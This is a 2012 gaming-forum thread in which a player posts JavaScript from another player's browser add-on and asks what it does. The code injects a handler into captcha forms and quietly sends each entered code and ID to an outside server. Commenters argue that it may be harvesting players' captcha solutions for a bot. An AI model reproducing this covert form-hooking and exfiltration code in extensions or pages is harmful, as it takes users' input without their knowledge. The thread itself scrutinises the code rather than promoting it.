Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!

Bean - Please explain the signup javascript in your add-on.

edited October 2012 in General

//x=document.getElementsByName("x")
var server = window.location.href.split("/")[4];
// We need to modify the page so that when they hit submit, it triggers our function aswell as theirs to send us the captcha.

function SubmitCaptcha(data)
{
var elms = data.elements;
var codeID = '';
var code = '';
for(i=0;i < elms.length; i++)
{
if(elms[i].name=="codeID")
{
codeID = elms[i].value;
}
if(elms[i].name=="code")
{
if(elms[i].name!="")
{
code = elms[i].value;
}
}
}

// Send it to SKTools
var invocation = new XMLHttpRequest();
if(invocation)
{
var body = "mode=" + escape("Captcha") + "&version=" + escape("1.0") + "&code=" + code + "&codeID=" + codeID;
invocation.open('POST', 'http://firefox.starkingdomstools.com/', true);
invocation.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
invocation.onreadystatechange = function()
{
if(invocation.readyState == 4)
{
if(invocation.status == 200)
{
return false;
}
else
{
return false;
}
}
else
{
return false;
}
}
invocation.send(body);
}
}
var forms = document.forms;
if(forms)
{
for(var i = 0; i < forms.length; i++)
{
var elms = forms[i].elements;
var codeID = false;
var code = false;
for(ii=0;ii < elms.length; ii++)
{
if(elms[ii].name=="codeID")
{
codeID = true;
}
if(elms[ii].name=="code")
{
if(elms[ii].name!="")
{
code = true;
}
}
}
if(code&&codeID)
{
var current = forms[i].onsubmit;
forms[i].setAttribute("onSubmit", "SubmitCaptcha(this);" + current);
}
}
}

var script = document.createElement("script");
script.type = "application/javascript";
script.innerHTML = ";" + SubmitCaptcha + ";";
document.body.appendChild(script);

Comments

• explain for people who have no idea :)

• // We need to modify the page so that when they hit submit, it triggers our function aswell as theirs to send us the captcha.

it looks like he is sealing captchas?
  • Yes, wondering why.
  • just a theory...

when a sk screen is put on autorefresh, at some point it will end up with the captcha block...
    if captcha feedback thing works, autorefresh can stay working indefinitely as long as there's ppl executing the captcha...

that would apply for any other thing that requires captcha...

• edited October 2012
    no... you don't know what you're talking about
  • "We need to modify the page so that when they hit submit, it triggers our function aswell as their"

to me, this means an attemp to have your captcha executed everytime anyone else do their own captcha
  • Looks like he is trying to steal Dogtowns s2 premium.
  • "We need to modify the page so that when they hit submit, it triggers our function aswell as their"

to me, this means an attemp to have your captcha executed everytime anyone else do their own captcha
    Yes I guess if you didn't know anything about anything you could glean that from a poorly written comment.

However, what it actually does is submit the captcha information to beans server.

• sci is typing in some weird programmer language

must be a computer hacker

calling the fbi
  • i want to see sha 256 encryption

Yes I guess if you didn't know anything about anything you could glean that from a poorly written comment.

However, what it actually does is submit the captcha information to beans server.

Do you have a insinuation/suggestion, or are you seriously befuddled about why Beans is collecting this data?

If it's the latter I find it ironic how condescending you're being.

Do you have a insinuation/suggestion, or are you seriously befuddled about why Beans is collecting this data?

If it's the latter I find it ironic how condescending you're being.
    Considering they expire. Yes, I'm curious. I also would like he to shed light on what he is using the information for.
  • oh look some hieroglyphs i wonder what the aliens are trying to tell us...
  • That beanland is kesha and will soon our KDs
  • That beanland is kesha and will soon our KDs
    yes. . he will soon our kds
  • He will soon all your kds are belong to him.
  • edited October 2012
    I'm curious too. Doubt he can do anything malicious to the user with it but still want to see his response.
  • sci is typing in some weird programmer language

must be a computer hacker

calling the fbi
  • edited October 2012
    Looks like he is trying to steal Dogtowns s2 premium.
    But then how will I run all my multis and bots!?
  • Social you should be happy Sci checked the code. It could just as easily send other info about you. With a few tweeks it could crack the capture for you which is likely why this is here. Perhaps Bean has a bot script of his own but he removed that part of the formula.
  • What other info dank? I don't play Beans game. And if I did, and I never entered my phone, address, soc. sec, bank acct, credit card, or other actually important items of information, how much do you think I really care? I'm assuming that Bean is the administrator of his own game - so he could probably make any alteration within it at any time anyway.
  • If he wanted to, he could probably put cookie trackers and shit in it.
  • Would he put that comment in if it was something devious?

Could have prob hidden it if it was doing something bad, or at least not explain it in plain English comments haha
  • Maybe he's logging capchas just for the sake of having a log - or in case something devious is happening. You'd like to depend on Google for having airtight captchas but they can't even file their own earnings so who knows.
  • Maybe he needed captchas filling in for another project so got us to do them for him while we do the sk ones.... its a small price to pay for all the work hes done on his extension etc
  • Pros don't use SK tools.
    That's right, sk tools uses pros ;]
    does that mean you use it then?
  • edited October 2012
    Would he put that comment in if it was something devious?
    Before release sure. Coders comment everything out of habit. It's actually a sign of a good coder covering the bases. You don't want to dig through a ton of code looking for crap when you want to make a quick change. I know Bean does have a bot this is probably part of it. In the past he was upfront about using a bot to gather info for his scanner. He slapped this together quickly for the tank change. I've not seen Bean do anything malicious to users but nothing wrong with making sure it stays that way. If you use his script he can have your cookies. He has your ip too. So never be too trusting.
  • All Sci is asking for is an explanation, didnt see him accuse or anything. Nothing wrong with that, it looks like alien symbols to me.